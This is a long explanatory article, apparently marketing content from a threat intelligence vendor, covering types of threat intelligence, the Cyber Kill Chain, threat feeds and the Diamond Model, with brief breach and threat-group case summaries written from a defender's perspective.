Tactical threat intelligence outlines the tactics, techniques, and procedures (TTPs) of threat actors. It should help defenders understand, in specific terms, how their organization might be attacked and the best ways to defend against or mitigate those attacks. It usually includes technical context, and is used by personnel directly involved in the defense of an organization, such as system architects, administrators, and security staff.Stakeholders and consumers of tactical threat intelligence can include: SOC Analysts IT Analysts Vulnerability Management Teams Security Architects (for integrations) Reports produced by security vendors are often the easiest way to get tactical threat intelligence. Look for information in reports about the attack vectors, tools, and infrastructure that attackers are using, including specifics about what vulnerabilities are being targeted and what exploits attackers are leveraging, as well as what strategies and tools that they may be using to avoid or delay detection.Tactical threat intelligence should be used to inform improvements to existing security controls and processes and speed up incident response. Because many of the questions answered by tactical intelligence are unique to your organization, and need to be answered on a short deadline — for example, “Is this critical vulnerability being exploited by threat actors targeting my industry present in my systems?” — having a threat intelligence solution that integrates data from within your own network is crucial.
Operational intelligence is knowledge about cyber attacks, events, or campaigns. It gives specialized insights that help incident response teams understand the nature, intent, and timing of specific attacks.Stakeholders and consumers of operational threat intelligence can include: Security Leaders SOC Managers Threat Hunters Cyber Threat Intelligence Teams Incident Responders Because this usually includes technical information — information like what attack vector is being used, what vulnerabilities are being exploited, or what command and control domains are being employed — this kind of intelligence is also referred to as technical threat intelligence. A common source of technical information is threat data feeds, which usually focus on a single type of indicator, like malware hashes or suspicious domains.But if technical threat intelligence is strictly thought of as deriving from technical information like threat data feeds, then technical and operational threat intelligence are not totally synonymous — more like a Venn diagram with huge overlaps. Other sources of information on specific attacks can come from closed sources like the interception of threat group communications, either through infiltration or breaking into those channels of communication.Consequently, there are a few barriers to gathering this kind of intelligence: Access — Threat groups may communicate over private and encrypted channels, or require some proof of identification. There are also language barriers with threat groups located in foreign countries. Noise — It can be difficult or impossible to manually gather good intelligence from high-volume sources like chat rooms and social media. Obfuscation — To avoid detection, threat groups might employ obfuscation tactics like using codenames.
Threat intelligence solutions that rely on machine learning processes for automated data collection on a large scale can overcome many of these issues when trying to develop effective operational threat intelligence. A solution that uses natural language processing, for example, will be able to gather information from foreign-language sources without needing human expertise to decipher it.
Strategic threat intelligence provides a broad overview of an organization’s threat landscape. It’s intended to inform high-level decisions made by executives and other decision-makers at an organization — as such, the content is generally less technical and is presented through reports or briefings. Good strategic intelligence should provide insight into areas like the risks associated with certain lines of action, broad patterns in threat actor tactics and targets, and geopolitical events and trends.Stakeholders and consumers of strategic intelligence can include: C-Suite (CISO, CIO, CSO, CTO) Board Members Senior VPs Intelligence Leaders (Cyber and Physical) Common sources of information for strategic threat intelligence include:
Policy documents from nation-states or nongovernmental organizations News from local and national media, industry- and subject-specific publications, or other subject-matter experts White papers, research reports, and other content produced by security organizations Producing strong strategic threat intelligence starts with asking focused, specific questions to set the intelligence requirements. It also takes analysts with expertise outside of typical cybersecurity skills — in particular, a strong understanding of sociopolitical and business concepts.Although the final product is non-technical, producing effective strategic intelligence takes deep research through massive volumes of data, often across multiple languages. That can make the initial collection and processing of data too difficult to perform manually, even for those rarified analysts who possess the right language skills, technical background, and tradecraft. A threat intelligence solution that automates data collection and processing helps reduce this burden and allows analysts who do not have as much expertise to work more effectively.Data processing takes place at a scale today that requires automation to be comprehensive. Combine data points from many different types of sources — including open, dark web, and technical sources — to form the most robust picture possible.
Recorded Future uses machine learning techniques in four ways to improve data collection and aggregation — to structure data into categories, to analyze text across multiple languages, to provide risk scores, and to generate predictive models.
Ontology has to do with how we split concepts up and how we group them together. In data science, ontologies represent categories of entities based on their names, properties, and relationships to each other, making them easier to sort into hierarchies of sets. For example, Boston, London, and Gothenburg are all distinct entities that will also fall under the broader “city” entity.If entities represent a way to sort physically distinct concepts, then events sort concepts over time. Recorded Future events are language independent — something like “John visited Paris,” “John took a trip to Paris,” “Джон прилетел в Париж,” and “John a visité Paris” are all recognized as the same event.Ontologies and events enable powerful searches over categories, letting analysts focus on the bigger picture rather than having to manually sort through data themselves.
With natural language processing, entities and events are able to go beyond bare keywords, turning unstructured text from sources across different languages into a structured database.The machine learning driving this process can separate advertising from primary content, classify text into categories like prose, data logs, or code, and disambiguate between entities with the same name (like “Apple” the company, and “apple” the fruit) by using contextual clues in the surrounding text.This way, the system can parse text from millions of documents daily across seven different languages — a task that would require an impractically large and skilled team of human analysts to do. Saving time like this helps IT security teams work 32 percent more efficiently with Recorded Future.Machine learning and statistical methodology are used to further sort entities and events by importance — for example, by assigning risk scores to malicious entities.Risk scores are calculated through two systems: one driven by rules based on human intuition and experience, and the other driven by machine learning trained on an already vetted dataset.Classifiers like risk scores provide both a judgment (“this event is critical”) and context explaining the score (“because multiple sources confirm that this IP address is malicious”).
Automating how risks are classified saves analysts time sorting through false positives and deciding what to prioritize, helping IT security staff who use Recorded Future spend 34 percent less time compiling reports.Machine learning can also generate models that predict the future, oftentimes much more accurately than any human analysts, by drawing on the deep pools of data previously mined and categorized.
This is a particularly strong “law of large numbers” application of machine learning — as we continue to draw on more sources of data, these predictive models will become more and more accurate.Examples of threat intel usage encompass identifying emerging cyber threats to better understand the cyber threat landscape, detecting indicators of compromise (IOCs) to promptly detect and respond to security incidents, and informing decision making with evidence-based assessments to enhance security practices.To implement cyber threat intel, organizations should establish a threat intelligence lifecycle to organize the collection, analysis, and dissemination of threat data. Utilizing a threat intelligence vendor can aid in aggregating and analyzing data, thereby identifying attack vectors. Furthermore, training personnel on different types of threat intel, like tactical intelligence, is crucial for effectively interpreting intelligence reports and responding to threats.Measuring the effectiveness of cyber threat intelligence can be achieved by monitoring the rate at which cyber threat intel aids in detecting and mitigating threats. Evaluating the accuracy and relevance of the intelligence reports in aiding timely response to incidents is also key. Additionally, assessing how well the intelligence informs decision making in managing cyber threat actors is crucial for ensuring the organization is well-protected.Common challenges in cyber threat intel deployment include data overload and false positives. Solutions may involve employing artificial intelligence to filter and prioritize threat data, and enhancing collaboration between different organizational units for better threat intel utilization, which in turn improves the organization's ability to detect and respond to threats.The latest trends and developments in cyber threat intel involve the integration of artificial intelligence and machine learning for automated analysis and prediction of cyber threat actors and emerging cyber threats. There's a growing emphasis on collaborative and shared threat intel platforms to better understand and mitigate evolving threats in the cyber threat landscape, which is instrumental in improving the organization's security posture.The cyber threat intelligence cycle is pivotal for security teams as it provides a structured methodology to gather, analyze, and utilize threat intelligence. This cycle aids in understanding the threat landscape better, which in turn helps in preparing for and reacting to security threats efficiently. Through this cycle, actionable intelligence is generated which is instrumental in making informed decisions to bolster the organization's security posture against cyber attacks.Implementing a threat intelligence program empowers organizations with the capability to anticipate, prepare for, and mitigate potential security threats. This program is an integral part of the threat intelligence process, facilitating a deeper understanding of threat actors and their tactics. It thereby enables the threat intelligence team to deliver finished threat intelligence crucial for proactive defense measures. Moreover, a threat intelligence program enriches incident response strategies and fosters a culture of continuous learning and adaptation to the evolving threat landscape.Organizations operating in sectors with high-value data such as finance, healthcare, and government are often prime targets for threat actors, hence they greatly benefit from the cyber threat intelligence cycle. This cycle, with its defined threat intelligence lifecycle stages, aids in intelligence collection and threat intelligence analysis, crucial for understanding and mitigating potential risks. Additionally, organizations with a significant online presence, businesses that focus heavily on uptime, or those subject to regulatory compliance also find the cyber threat intelligence cycle indispensable in navigating the complex security landscape.The common challenges during implementation include the initial setup of a robust threat intelligence platform, ensuring continuous and relevant intelligence collection, and analyzing data accurately to generate actionable insights. The effectiveness of threat intelligence reports can be hindered by a lack of skilled personnel or inadequate resources. Furthermore, integrating the insights obtained from the threat intelligence analysis into the existing incident response procedures and ensuring a seamless flow of information can also pose significant challenges. Many people believe threat intelligence is primarily about identifying attacks before they happen. In reality, it’s much more about raising your organization’s security profile against all incoming attacks. Different types of threat actors select targets in very different ways. As a rule, the more specific their targeting process, the harder it will be to collect threat intelligence at the pre-planning stage. While threat intelligence can add value at every stage of the kill chain, it’s typically in the form of malicious IP/domain/hash lists and post mortem attack analyses. It’s not just about incident response. In order to add maximum value, threat intelligence should be made available across your security function. Without context, threat intelligence quickly becomes unmanageable. Ensure you’re providing your threat analysts with the tools they need to operate effectively. Before you start gathering threat intelligence, you must answer a simple question: “What am I trying to achieve?”The obvious answer is “an improved cyber security profile,” but if you really want to maximize your return on investment you’ll need to be much more specific.Cyber security is a tremendously complex operation, with many moving parts, so in order to be maximally useful your threat intelligence program must deliver intelligence that can be used to mitigate or prevent specific cyber attacks.But cyber attacks are complex affairs in their own right. It’s not simply a case of picking a target and attacking it, the cyber attack kill chain is an established and often lengthy process, with multiple phases.Before we look at the kill chain, it’s important to have an understanding of threat actor types.
In a previous article, we explained how threat actors can be split into four primary types. During the webinar, however, Konrad went a step further and split threat actors into six categories.
In this case, rather than arranging threat actors by levels of skill or organization, Konrad ordered them by the level of specificity typically involved in their target selection.On the left-hand side of the image above you’ll see criminals that are all about mass targeting. A low-level criminal actor, for instance, will tend to choose targets almost at random, using mass attack vectors to spread their net as wide as they possibly can.Even as we move closer to the middle of the scale to consider hacktivists and criminal hackers, targeting is usually based purely on industry or organization type, for example any healthcare organization, or any financial institution.At the other end of the scale, a disgruntled employee is interested in causing damage to one specific organization. Foreign nations and competitors may cast their net a little wider, but they’re still interested in a very specific set of targets.So why order threat actors by their target selection, rather than by the level of sophistication normally observed in their attacks? Well, when it comes to gathering intelligence, the way in which threat actors select targets has a huge bearing on the quality and quantity of threat intelligence typically available.
Threat actors on the left of the scale tend to do their targeting right out in the open. Low-level criminals, for example, often discuss their targets through dark web forums, IRC, and even Twitter. In the same vein, hacktivists routinely announce their intended targets through public channels. As a result, collecting actionable threat intelligence is very achievable.Threat actors on the right of this scale, however, are far more secretive. Disgruntled employees are a prime example of a threat that are hard to identify through external threat intelligence (although monitoring network activity may be effective), as they invariably act alone. Foreign nations and competitors, meanwhile, have their own internal means of communication, making interception functionally impossible.
Of course, that’s not to say threat intelligence is entirely ineffective at identifying threats from these actors. More than one insider has been caught attempting to sell stolen data through dark web markets, and, if you have the expertise, there are ways to predict nation-state attacks with surprising accuracy.As a rule, though, the more specific a threat actor’s targeting becomes, the harder it will be to gather valuable intelligence on their activity.
The term 'Cyber Kill Chain', a concept and framework in cybersecurity developed by Lockheed Martin, describes the stages of a cyber attack. This model, which has its origins in military terminology, aids security teams in comprehending and countering cyber threats. It delineates the progression of steps an attacker undertakes, from reconnaissance to the command and control phase, to infiltrate a network and access sensitive data.
According to Lockheed Martin Corporation, in their white-paper titled: “Intelligence-Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains“:“Through this model, defenders can develop resilient mitigations against intruders and intelligently prioritize investments in new technology or processes.”
Understanding each phase of a cyber attack is critical. This includes recognizing the deployment of malicious code and the execution of brute force attacks. Such knowledge enables security teams to enhance their security controls, vital in defending against both internal and external attacks. This comprehensive approach encompasses protecting against insider threats and ensuring the integrity of perimeter security. Additionally, integrating insights from the Diamond Model of Intrusion Analysis can further refine this understanding, offering another layer of analysis to complement the Cyber Kill Chain framework.The Cyber Kill Chain framework is more than just a theoretical construct; it's a practical tool for intrusion prevention systems and a cornerstone in preventing security breaches. Whether it's guarding against cyber kill chain protect strategies or identifying the signs of a cyber kill chain model in action, this methodology equips professionals with the knowledge to thwart cyber attacks. For organizations, it represents a proactive measure against the ever-present and evolving cyber threats, ensuring the robustness of their internal or external attack prevention strategies.
When they consider threat intelligence, most people think about uncovering threat actors’ plans, and foiling incoming attacks before they start. But while that is a highly valuable function of threat intelligence, it’s far from being the only application.Among other things, threat intelligence offers: Information on the latest vulnerabilities Threat actor tactics, techniques, and procedures (TTPs) Lists of malicious IPs, domains, and hashes Indicators of compromise (IOCs) Past attack forensics Evidence of leaked information In short, threat intelligence is useful not simply for thwarting individual attacks, but for improving your organization’s security profile against all future attacks.For now, though, let’s assume you are looking to identify and block specific incoming attacks. For a cyber attack to be successful, it will typically need to go through seven discrete stages, and at each of these stages there are opportunities to gather actionable threat intelligence.Before anything else can happen, threat actors must select a target. Naturally, the organization they choose to attack will reflect their motive.Cyber criminals and criminal hackers, for instance, are almost always financially motivated, and historically have targeted everything from banks and online payment companies to small businesses and sports clubs. At the other end of the scale, state actors will have a very specific set of targets based on the content of their nation’s five-year plan.As already mentioned, many hackers, particularly low-level cyber criminals, pick their targets in public or semi-public forums. Hacktivists, similarly, tend to announce their targets publicly as part of their agenda.But whether or not threat actors discuss their targets openly, threat intelligence plays a vital role at this stage of the cyber attack kill chain. As already mentioned, there will be times when you’re able to identify and thwart an incoming attack before it happens, but in all honesty that’s not the primary benefit of threat intelligence.Instead, threat intelligence can help you understand which attackers are most likely to target your organization, enabling you to prepare your defenses in advance. As a small organization with high employee satisfaction, for instance, you’re unlikely to be targeted by nation states, insiders, competitors, or hacktivists, but very likely to be targeted by common cyber criminals and hackers.No matter how large your organization, there is always going to be a limit to the resources that can be allocated to security. Understanding the types of threat actors most likely to target your organization is a crucial first step in allocating your security budget.During the second stage of the cyber attack kill chain, threat actors attempt to learn as much as possible about their intended target. And as Konrad explained during the webinar, for the most part this process happens in private.Of course, with some lower-level threat actors, some research may be conducted through dark web forums and IRC channels, and in those instances threat intelligence may provide a valuable early warning. Most of the time, however, threat intelligence will have little to offer during this stage of a cyber attack.Once a target has been selected and researched, threat actors will select an attack vector. Unsurprisingly, this tends not to be something that happens in the open, making the chances of using threat intelligence to catch an incoming attack at this stage exceedingly minimal.
But, once again, threat intelligence isn’t really about detecting specific attacks. One of its most valuable functions, in fact, is in learning about current threat actor TTPs.Once you know which threat actors are most likely to target your organization, the next logical step is to use threat intelligence to identify who, when, and how they typically attack. Most threat actors have preferred attack vectors, such as spear phishing or browser attacks, and knowing this can be a huge help when planning defenses and allocating security resources.Another hugely valuable product of threat intelligence comes in the form of post-mortem analysis of past attacks, which can help your analysts understand exactly how threat actors have conducted successful attacks against similar organizations. For example, threat intelligence can help you understand precisely how the latest malware variants function, making the task of tightening your technical controls much more achievable.Of course, once all the planning is done, threat actors have a job to do: compromise your network.To do this, they’ll generally use an initial attack to gain a foothold inside your network. This could, for example, be a phishing attack that tricks a user into downloading malware, or giving up their credentials.Of all the stages of the cyber attack kill chain, this is perhaps the area in which the most valuable intelligence is available. A powerful threat intelligence capability will provide you with a constantly updating set of IPs, domains, and hashes that are associated with malicious activity, as well as the latest post-mortem analysis of each discrete attack vector.
With all that intelligence at your fingertips, tightening your technical controls to thwart the vast majority of incoming attacks is very achievable, particularly if your analysts have access to a tool that can help them quickly triage potential threats. Even better, if an attack does bypass your technical controls, your incident response team will be armed with everything they need (IOCs, etc.) to identify compromised assets before serious harm is done.It’s important to understand that tricking a user into downloading malware doesn’t automatically grant a threat actor access to your network. At this stage in the kill chain, assuming their attack is successful, the threat actor achieves a minor compromise of your network, perhaps by taking control of a terminal or user account.This stage of the kill chain is largely reliant on your technical controls, which should already have been tightened based on past attack forensics and other related intelligence. If you haven’t been able to identify and block the attack at stage four, though, you’ll need to focus on network activity to spot the attack before it goes any further.Once again, using threat intelligence to identify malicious activity will add tremendously to your chances of quickly separating false positives from real threats, but only if you employ a tool that can take the brunt of the work out of analysts’ hands.
Many cyber attacks, and particularly those that rely on malware, rely on a process called “command and control.” The malicious payload, once it has gained a foothold within the target network, sends communications back to a server owned (or compromised) by the threat actor. The reason for this is simple: While malware is designed to exploit specific vulnerabilities to compromise a target, it usually isn’t pre-programmed to act independently once the infection has taken place. Instead, threat actors make use of C2 servers to remotely control their infection and achieve their end goal.Once again, threat intelligence has a role to play in blocking these communications. New servers are constantly being identified as malicious, so if you have an effective threat intelligence capability and routinely monitor network activity there’s a strong chance you’ll be able to block an attack if it gets to this stage.Once a threat actor has the access they need, it’s time for them to do the deed they came for. Depending on the type of actor, this could be anything from stealing funds, to destroying data, to committing espionage.Realistically, if an attack gets to this stage, it’s going to be difficult to prevent it. With that said, post-mortem analysis of past attacks can help you to identify anomalous behavior, which alongside honeypots and darknets may be enough for your incident response team to contain the threat before too much damage is done.Equally, if data or sensitive assets are stolen, threat intelligence can often provide an early warning system by alerting you when they turn up for sale on dark web markets. There have been many such cases where organizations have successfully worked with law enforcement to prevent these sales, which can drastically limit the damage caused by a successful attack.

A comprehensive study conducted by Glorin Sebastian from the Georgia Institute of Technology, utilizing the Lockheed Martin Cyber Kill Chain model, revealed critical insights into several high-profile data breaches. This research meticulously traced the stages of these breaches, from reconnaissance to the final actions on objectives, offering a detailed understanding of how each attack unfolded and the key vulnerabilities exploited. The analysis covered the following breaches: Equifax Breach (May 13 - July 30, 2017): This breach, caused by delayed patching of a known vulnerability in Apache Struts, led to the compromise of personal data of millions. Target Breach (November 2013): A supply chain attack that began with a phishing email to a vendor, leading to the theft of credit card information from over 110 million customers. Yahoo Breach (Late 2014): Stemming from a spear-phishing attack on an employee, this breach compromised at least 500 million user accounts, making it one of the largest breaches in history. Sands Casino Attack (February 2014): A politically motivated attack by nation-state actors, exploiting a vulnerability in a test version of the casino’s website. Atlanta & Not Petya Case (March 22, 2018): This ransomware attack, using the SamSam virus, significantly disrupted the city of Atlanta's IT infrastructure. Sebastian's research uses these breaches to demonstrate the practical application of the Cyber Kill Chain model in cybersecurity. Each case highlights different aspects of cyber threats and the importance of comprehensive security strategies across various stages of an attack.Threat intelligence feeds are real-time streams of data that provide information on potential cyber threats and risks. Feeds are usually made up of simple indicators or artifacts, and individual feeds usually focus on a single area of interest. For example, a feed might present a stream of information on: Suspicious domains Lists of known malware hashes IP addresses associated with malicious activity With the information provided by these feeds, you might choose to blacklist communications and connection requests originating from malicious sources, for example. These feeds aggregate publicly available data from blogs, forums, and other open sources. They are usually free but can require a significant amount of time and expertise to sift through and identify relevant information.These are provided by commercial vendors and often come with a subscription fee. They offer curated and often real-time intelligence, and usually provide a higher level of detail compared to open source feeds.
These feeds focus on threats relevant to specific industries. They can be either open source or paid, and are valuable for organizations looking for insights on threats pertinent to their particular sector. Some examples include Google SafeBrowsing, or VirusTotal.
Governments and NGOs sometimes provide threat intelligence feeds to help organizations within their jurisdiction or sector stay informed about relevant cyber threats. These feeds can be either freely available or provided at a cost, and might also include sharing platforms for mutual exchange of threat intelligence among different entities. Examples include the Department of Homeland Security: Automated Indicator Sharing, or the FBI InfraGard project. While all these 4 types of threat intelligence feeds offer valuable data, solely relying on these feeds can lead to a narrow view of the threat landscape. The crucial step lies in meticulously analyzing, enriching, and integrating this data within a broader cybersecurity framework, transitioning it from mere information to actionable insights for robust threat detection and response. TechTarget highlights the value of threat intel feeds by stating: “Properly integrating threat intelligence feeds helps to rapidly detect and identify nascent attack techniques”. Informed Decision-Making: Make empowered cybersecurity decisions with the enriched data provided by threat intelligence feeds, aiding in the identification and mitigation of potential risks. Efficiency & Resource Allocation: Automate routine data collection and analysis tasks through threat intelligence feeds, allowing IT staff to focus on higher-priority activities, and ensuring optimum resource allocation. Enhanced Incident Response: Utilize the contextual insights from threat intelligence feeds to prioritize and respond to incidents more effectively, improving the overall incident response workflow. Proactive Security Measures: Leverage the intelligence provided to bolster defenses and prepare for specific threats, enhancing the organization's proactive security measures and readiness against potential cyber attacks. Improved Speed: Access real-time threat insights through threat feeds, enabling swift response to emerging threats, and maintaining a step ahead of adversaries in the fast-evolving cybersecurity landscape. For feeds and threat information to be actionable, they generally need to have content, be enriched with information, and be easily integrated into security platforms so that the external information they provide can be correlated allowing you to identify potential attacks.Once a potential threat is compared with internal telemetry and identified as a concern, an alert will be created. If analysts determine that a new security control is needed (like a new rule for the firewall), it can be completed as with any other security update, and the alert marked as completed.Without more comprehensive solutions, each alert will still need to be manually triaged. But the tools that consolidate and combine the right feeds can free up a huge amount of analyst time to focus on producing more complex threat intelligence. And some threat intelligence solutions can automatically resolve more routine alerts.
Because feeds are essentially non-prioritized lists of data that come without context, they can sometimes add to the burden of whoever’s consuming them, rather than reduce it. So selecting the right threat feeds and correlating the information properly means setting intelligence goals first and then prioritizing threat information based on those goals.Assess your organization’s capabilities and goals by asking questions like: What does our network infrastructure look like? What risks are unique to our industry? What is our current security posture, including our budget and resources available to devote to producing and applying threat intelligence? With that framework in mind, assess the feeds and information you may want to use according to these criteria:
Data Source: Cyber threat intelligence feeds get their data from sources like customer telemetry, scanning and crawling open sources (a practice known as Open Source Intelligence, or OSINT), honeypots or deception operations, malware processing, and human-produced intelligence. Not all of these sources may be relevant — prioritizing threat intelligence feeds with information that is credible and gives you insight into threats that matter to you is critical. Percentage of Unique Data: Some paid feeds are just collections of data coming from free feeds, meaning you’re just paying for curation. Periodicity of Data: How long is the data relevant? Is it related to specific, immediate activity, or more strategic intelligence on long-term trends? Transparency of Sources: Knowing where the data is coming from will help you evaluate its relevance and usefulness.
Return on Investment: Calculating the ROI of a particular feed will usually involve tracking the correlation rate, which is the percentage of alerts that correspond with your internal telemetry in a given week, month, or quarter.Beyond this, you could go a step further and track the effectiveness of any new security controls created as a result of each feed. For instance, a new security control resulting in more malicious connection attempts being blocked reflects positively on the feed that informed it.All of this assumes that you have a tracking process in place. Most threat intelligence and SIEM platforms include these types of monitoring functions, particularly if they have access to your network telemetry, so if you have the option, this is certainly the easiest way to go — manual tracking is possible but cumbersome.
When they first appeared, threat intelligence feeds constituted a huge leap forward, enabling security professionals to manage higher levels of relevant information than ever before. As the cyber threat intelligence cycle evolved, it became apparent that the abundance of free feeds in particular became “noisy" and filled with errors and false positives. These issues, coupled with the sheer volume of data available, started to pose problems.Instead of viewing dozens of feeds separately, using a threat intelligence platform not only combines them all but also curates and compares the internal telemetry, generating customized alerts for your incident response and threat intelligence team.The most powerful intelligence platforms, like the Recorded Future Intelligence Cloud, automatically curate intelligence feeds, sifting through data to identify and prioritize threat intelligence for your organization to action.An example of a threat intelligence feed is the URLhaus project, which is an Open Source Threat Intelligence feed (OSINT) that collects, tracks, and shares malware URLs, aiding security teams in identifying malicious websites. This is one of many threat intelligence feeds available that help in staying updated on the cybersecurity threats landscape.Creating a threat feed involves several steps. Initially, it's essential to collect data from various sources like logs, network traffic, and external intelligence sources. Security tools can then be employed to analyze and filter this data, identifying relevant threat intelligence data. This data is then formatted into threat intelligence feeds formats which can be integrated into threat intelligence platforms, aiding in threat hunting and analysis.An Intelligence Feed is a broader term that encompasses various types of data feeds, not limited to cybersecurity. On the other hand, a Threat Intelligence Feed is a subset of intelligence feeds, specifically focused on providing data about cybersecurity threats, such as malware signatures, malicious IP addresses, and activities of threat actors. It helps security analysts and other cybersecurity professionals in identifying and mitigating potential threats.The terms "Threat Feeds" and "Threat Intel Feeds" are often used interchangeably. However, they can be nuanced; Threat Feeds might refer to raw data about emerging threats, while Threat Intel Feeds imply a level of analysis or context has been added to the raw data to provide actionable intelligence. This actionable intelligence is crucial for security teams to devise actual threat strategies. Threat reports generated from Threat Intel Feeds are more refined and provide insights that aid in understanding the behavior and tactics of threat actors.
OSINT (Open Source Intelligence) Feeds and Paid Intelligence Feeds differ in source and information range. OSINT feeds are free, community-managed, and often focus on distinct threats like malware URLs. Some notable examples of open source intelligence feeds could be URLhaus or the Spamhaus Project. On the flip side, Paid Intelligence Feeds may use open-source data but also access closed sources or aggregate various feeds for wider insights. Though they provide more data, they could overwhelm staff, risking overlooked threats. Regardless of the feed type, it's essential for the IT team to decipher the data to act on critical insights effectively.
A resource threat feed is a type of data feed that focuses on providing information regarding the resources that are threatened by cyber adversaries. It encompasses details about the cyber threat landscape that could impact the security infrastructure of an organization. These feeds collect data on potential vulnerabilities, ongoing attacks, and emerging threats. The information can be presented in various threat intelligence feed formats like Structured Threat Information Expression (STIX). Resource threat feeds play a crucial role in enabling security operations teams to understand the threats to their resources and take appropriate measures to safeguard them.Determining the "best" threat intelligence feed largely depends on the specific needs and requirements of an individual or organization. The cyber threat intelligence field is vast, with multiple data feeds available, each catering to different aspects like strategic threat intelligence, infrastructure security, or government agency-focused intelligence.Some feeds might offer broad analysis and insights, while others could be specialized in certain areas like Artificial Intelligence-driven analysis or industry-specific threats. Government agencies might have different preferences compared to private sector entities. The Infrastructure Security Agency, for example, may require a different set of data compared to a tech startup. Therefore, the best threat intelligence feed would be one that aligns well with the user's needs, providing relevant, actionable intelligence that aids in fortifying the security infrastructure against cyber threats.
The "Diamond Model of Intrusion Analysis" was initially introduced by Sergio Caltagirone, Andrew Pendergast, and Christopher Betz in a technical report for the U.S. Department of Defense in 2013. In their own words: “The model establishes the basic atomic element of any intrusion activity, the event, composed of four core features: adversary, infrastructure, capability, and victim”.This model emphasizes the relationships and characteristics of four basic components: the adversary, capabilities, infrastructure, and victims. The main axiom of this models states, “For every intrusion event, there exists an adversary taking a step toward an intended goal by using a capability over infrastructure against a victim to produce a result.” This means that an intrusion event is defined as how the attacker demonstrates and uses certain capabilities and techniques over infrastructure against a target.
Understanding the adversary is pivotal in decoding the threat landscape in the model of intrusion analysis. It dives into the who and why behind cyber attacks, illuminating the motivations and entities involved. This understanding enables security teams to better predict and prepare for cyber threats. The following points elaborate on this aspect: Origin: What is the geographical or organizational origin of the attack organizations? Identity: Who are the individuals or activity groups behind the attacks? Sponsorship: Are there any entities sponsoring or endorsing the attackers? Motivation: What drives the attackers to initiate the attack? Timeline: What is the timeline of the attackers' activities, including planning and execution? Unveiling the infrastructure employed by attackers exposes the technical backbone of malicious operations. This encompasses the compromised systems, command and control servers, and data management tactics, acting as the logical communication structures for the operations. The details are as follows: Compromised Systems: Identify the computers or networks that have been compromised. Command & Control (C2) Domains: What domain names are being used for command and control? C2 Server Locations: Where are the command and control servers situated? C2 Server Types: What types of servers are employed for command and control? C2 Mechanism and Structure: Detail the structure and mechanism of the command and control setup. Data Management and Control: How is the incoming data being managed and controlled? Data Leakage Paths: Identify the paths through which data leakage occurs. Evaluating the capability of attackers provides insight into their skill set and sophistication. This assessment is crucial for security analysts to develop proactive countermeasures against potential threats. The specifics are highlighted below: Reconnaissance Skills: What capabilities do the attackers possess to conduct reconnaissance? Attack Delivery: How proficient are the attackers in delivering their attacks? Exploit and Vulnerability Utilization: How adept are they at exploiting vulnerabilities? Malware and Backdoor Deployment: What skills do they have in deploying remote-controlled malware and backdoors? Tool Development: How capable are they in developing and refining their tools for attack? Identifying the target underscores the attackers' ultimate objective. It covers the geographical, industrial, individual, and data spheres in the crosshairs of malicious activities. Knowledge management and threat data gathered here can be shared via threat intelligence exchange protocols to bridge intelligence gaps. The following elements shed light on this aspect: Target Geography: What specific countries or regions are targeted? Industry Sector: Are there particular industry sectors in the crosshairs? Individual Targets: Are certain individuals or profiles being specifically targeted? Data Targeting: What types of data are the attackers after?
Across these facets, the Diamond Model intersects with other planning frameworks like the linear Cyber Kill Chain Model to extend a multidimensional view. By integrating meta features and contextual indicators into the analysis, security professionals can establish clear linkages between the different components of a cyber attack, from initial reconnaissance to eventual data exfiltration.
The process also entails devising mitigation strategies based on the analysis of activity threads and diamond events, which in turn refines the attack surface management. Central to this model is the focus on centered approaches that enhance the incident response through better detection mechanisms and threat information sharing. This comprehensive approach not only addresses the immediate threats but cultivates a culture of continuous improvement and adaptation in the face of evolving cyber threat landscapes.
Analyzing FIN8's Attack on Financial Institutions: A prime example of the Diamond Model in action is its application in unraveling the strategies of the FIN8 hacking group. Investigations uncovered that FIN8 leveraged PowerShell scripts as their attack infrastructure, deploying a sophisticated "Sardonic Backdoor" as their primary capability. This targeted attack on financial institutions highlights a critical 'diamond event' in the model, fitting neatly into the Execution/Persistence phase of a cyberattack's lifecycle.
Dissecting LAPSUS$ Ransomware by Meghan Jacquot and Kate Esprit: In a significant case, cybersecurity analysts Meghan Jacquot and Kate Esprit utilized the Diamond Model to decode the operations of the LAPSUS$ ransomware and hacking group. They identified key components of LAPSUS$'s strategy: using open-source hacking tools, Telegram, and underground forums as their infrastructure; skills in social engineering, DDoS attacks, and credential theft among their capabilities; with victims predominantly in telecommunications, software, technology, and gaming industries.
Carnegie Mellon University's Honeynet Project: The study “Using Honeynets and the Diamond Model for ICS Threat Analysis'' by John Kotheimer, Kyle O’Meara, and Deana Shick at Carnegie Mellon University offers another insightful application. Their focus was on how adversaries interact with honeynets in industrial control systems. By applying the Diamond Model, they successfully mapped these interactions, providing a comprehensive view of the attack strategies used in these specialized environments.These examples underscore the versatility and efficacy of the Diamond Model in providing a structured approach to analyzing and understanding diverse cyber threats, a crucial tool in the arsenal of today's cybersecurity professionals.Understanding the Diamond Model of Intrusion Analysis is crucial for security teams as it provides an analytical framework to dissect cybersecurity incidents. By delving into the adversary's infrastructure and understanding the general class of attackers, including malicious insiders, it offers a cognitive model that enriches the analytical workflow. The model's core features provide a lens to scrutinize various aspects of cyber threats, enabling a more strategic mitigation approach.It also identifies specific elements like e-mail addresses used in attacks, shedding light on the technology enabling these threats. This analytical process is a valuable tool for developing a tailored mitigation strategy, transitioning teams from reactive measures to a more proactive stance in combating cyber threats. Hence, the Diamond Model becomes an integral part of the security protocol, providing a structured method to analyze and respond to threats in a more informed manner.
By looking at a threat actor Intelligence Card™ in Recorded Future, we can see that this entity qualifies as the adversary component of the Diamond Model quite nicely. For example, the Dark Caracal Intelligence Card™ (below) shows us information about this adversary, including name, any nation-state affiliations, and analytical notes added in by the Insikt Group.
The Diamond Model threads adversaries with developing capabilities and techniques that are unique to that group. In Recorded Future, the Methods context directly translates to the Capabilities edge of that model. As shown below, it’s obvious that this adversary uses distinct malware and attack vectors as part of its capabilities and TTPs (tactics, techniques, and procedures). We can study additional capabilities by clicking the Timeline link below the Methods list to get a temporal visualization of the capabilities leveraged.

Adversaries also operate within an infrastructure to conduct their intrusions. This infrastructure can be composed of IP addresses, domains, botnets, and technologies in general. In our example, we can see that Dark Caracal is associated with a combination of indicators. As a starting point, these entities represent possible infrastructure and should be immediately correlated with internal network data to qualify intrusion investigations. A scenario would be seeing compromised Android devices connected to the corporate network communicating with command-and-control (C2) servers. The Technology, IP Address, Domain, Product, and Email Address sections of the Context in the Dark Caracal Intelligence Card™ can be used to describe part of that infrastructure, as shown below.
